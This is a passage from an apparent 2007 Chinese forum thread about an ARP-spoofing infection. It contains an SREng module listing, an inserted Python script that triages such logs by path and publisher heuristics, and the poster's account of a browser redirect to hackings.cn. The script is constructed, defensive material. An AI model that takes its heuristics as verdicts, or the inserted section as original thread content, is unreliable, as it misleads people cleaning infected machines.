    [C:\Program Files\Microsoft Office\OFFICE11\msostyle.dll]  [Microsoft Corporation, 11.0.5510]
    [C:\Program Files\Microsoft Office\OFFICE11\GdiPlus.DLL]  [Microsoft Corporation, 6.0.3260.0]
    [C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL]  [Microsoft Corporation, 6.04.9972]
    [C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\2052\VBE6INTL.DLL]  [Microsoft Corporation, 6.03.9070]
    [C:\Program Files\Common Files\Microsoft Shared\Smart Tag\CHDATEST.DLL]  [Microsoft Corporation, 2.00]
    [C:\Program Files\Common Files\Microsoft Shared\PROOF\2052\MSGR3SC.DLL]  [Microsoft Corporation, 3.0.1707.0]
    [C:\Program Files\Common Files\Microsoft Shared\Smart Tag\Chinese Measurement Converter\CHMETCNV.DLL]  [Microsoft Corp., 1.00]
    [C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL]  [Microsoft Corporation, 11.0.5510]
    [C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\2052\stintl.dll]  [Microsoft Corporation, 11.0.5510]
    [C:\Program Files\Common Files\Microsoft Shared\INK\INKOBJ.DLL]  [Microsoft Corporation, 2.0.2201.0 (xpsp1.020820-1800)]
    [C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\mdiui.dll]  [Microsoft Corporation, 11.3.1897.0]
    [C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\mdigraph.dll]  [Microsoft Corporation, 11.3.1897.0]
[PID: 2368][D:\专杀\sreng2\SREng.EXE]  [Smallfrogs Studio, 2.4.12.806]
    [C:\WINDOWS\system32\imon.dll]  [Eset , 2, 51, 26 ]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
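An added example, not from the original posts and not part of SREng: a first-pass triage script for the three SREng listings posted above (startup items, services and drivers; browser add-ons; running processes and their modules). It recognises the four line shapes SREng prints and flags entries that either run from a user-writable location (profile, Temp, Desktop) or carry no publisher/version information, the two things a reviewer checks first in a log like this. The excerpt is copied from the posts and abridged. The rules are heuristics, not a verdict: several entries they flag here (Proxy Switcher, the BLin download helper, the ESET plug-in DLL without version info) are software the poster installed, and each hit still needs a manual check of the file.

```python
import re

# Constructed, abridged excerpt of the SREng 2.4 listings in the posts above (paths as posted).
SAMPLE_LOG = r"""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe>  [(Verified)Microsoft Windows Publisher]
    <PSwitch><C:\Documents and Settings\********.********-C05015\My Documents\bbbb\Proxy Switcher Standard\ProxySwitcher.exe>  [N/A]
    <StormCodec_Helper><"E:\anzhuang\baofengyingyin\Storm Codec\StormSet.exe" /S /opti>  []
[NetrobocopLowLevelService / NPF][Stopped/Manual Start]
  <\??\C:\DOCUME~1\ANDYLA~1.SHA\LOCALS~1\Temp\nsb\npf.sys><N/A>
[npkcrypt / npkcrypt][Running/Auto Start]
  <\??\C:\Program Files\Tencent\QQ\npkcrypt.sys><INCA Internet Co., Ltd.>
[BLin IeDoor Class]
  {A7934164-66CE-4B01-AD28-A42F734E448D} <C:\Documents and Settings\********.********-C05015\blin\blinplug.dll, BLin Inc.>
[Shockwave Flash Object]
  {D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx, Adobe Systems, Inc.>
[PID: 476][C:\Program Files\Internet Explorer\IEXPLORE.EXE]  [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\Documents and Settings\********.********-C05015\blin\blinplug.dll]  [BLin Inc., 0, 7, 3, 18]
    [C:\Program Files\Eset\pr_imon.dll]  [N/A, ]
"""

# The four line shapes: startup entry, service/driver image, add-on CLSID line, process/module.
STARTUP = re.compile(r"^\s*<(?P<name>[^>]*)><(?P<cmd>[^>]*)>\s*\[(?P<co>[^\]]*)\]\s*$")
IMAGE   = re.compile(r"^\s*<(?P<cmd>[^>]*)><(?P<co>[^>]*)>\s*$")
ADDON   = re.compile(r"^\s*\{(?P<clsid>[0-9A-Fa-f-]{36})\}\s*<(?P<rest>.*)>\s*$")
MODULE  = re.compile(r"^\s*(?:\[PID:\s*(?P<pid>\d+)\])?\[(?P<cmd>[^\]]+)\]\s*\[(?P<info>[^\]]*)\]\s*$")
EXE_PATH = re.compile(r'([A-Za-z]:\\[^"<>]*?\.(?:exe|dll|sys|ocx|bat|cpl|scr))', re.I)

# Places a standard user can write to on XP (a Chinese XP names the desktop folder 桌面).
USER_WRITABLE = ("documents and settings", "docume~1", "\\temp\\", "\\desktop\\", "\\桌面\\")

def image_path(cmd):
    """Extract the image path from a command line, dropping quotes, arguments and the NT prefix."""
    m = EXE_PATH.search(cmd)
    return m.group(1) if m else cmd.strip('; "')

def parse_line(line):
    """Classify one SREng line -> (kind, image path, publisher) or None for headers."""
    m = STARTUP.match(line)
    if m:
        return "startup", image_path(m["cmd"]), m["co"]
    m = IMAGE.match(line)
    if m:
        return "service/driver", image_path(m["cmd"]), m["co"]
    m = ADDON.match(line)
    if m:
        path, _, co = m["rest"].partition(", ")
        return "browser add-on", path, co
    m = MODULE.match(line)
    if m and "\\" in m["cmd"]:  # section headers like [name / svc][state] have no path
        return ("process" if m["pid"] else "module"), m["cmd"], m["info"].split(",")[0]
    return None

def assess(path, publisher):
    reasons = []
    if any(k in path.lower() for k in USER_WRITABLE):
        reasons.append("image lives in a user-writable location")
    if publisher.strip() in ("", "N/A"):
        reasons.append("no publisher / version information")
    return reasons

def triage(log_text):
    """Entries worth a second look, 'high' (both reasons) before 'review' (one reason)."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        kind, path, publisher = parsed
        reasons = assess(path, publisher)
        if reasons:
            findings.append({"kind": kind, "path": path, "publisher": publisher.strip(),
                             "severity": "high" if len(reasons) == 2 else "review",
                             "reasons": reasons})
    findings.sort(key=lambda f: f["severity"] != "high")
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["severity"], f["kind"], f["path"], "|", "; ".join(f["reasons"]))
```

On the posted log this puts two entries at the top: the Proxy Switcher binary started from My Documents with no version information, and the NetrobocopLowLevelService driver npf.sys loaded from a Temp directory. Both are exactly the kind of entry a reviewer would ask the poster about before anything else, and the Temp-resident driver is the one that cannot be explained away by "I installed it".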

What the poster in reply #1 says is spot on. I use NOD32 and AVG Anti-Spyware, both can update, and they really cannot find anything any more. I have Anti arp sniffer on my computer and am using it now, and I have also found the infected computer on the LAN, but it is someone else's computer and I can't very well mess with it.

What happens when the browser is in use, see image: as soon as the browser opens, the status bar shows "Opening page http://www.hackings.cn/...

(Attachment: image/pjpeg, uploaded 2007-6-22 16:35:04)

NOD32 network detection, see image

(Attachment: image/pjpeg, uploaded 2007-6-22 16:36:48)

NOD32 detection results, see image

(Attachment: image/pjpeg, uploaded 2007-6-22 16:39:19)

Since using ANTI ARP SNIFFER my browsing speed has clearly improved. Sigh, when will antivirus software ever wipe this virus out! The infected machine has antivirus software too, but apparently it is no help.
Powered by Discuz!NT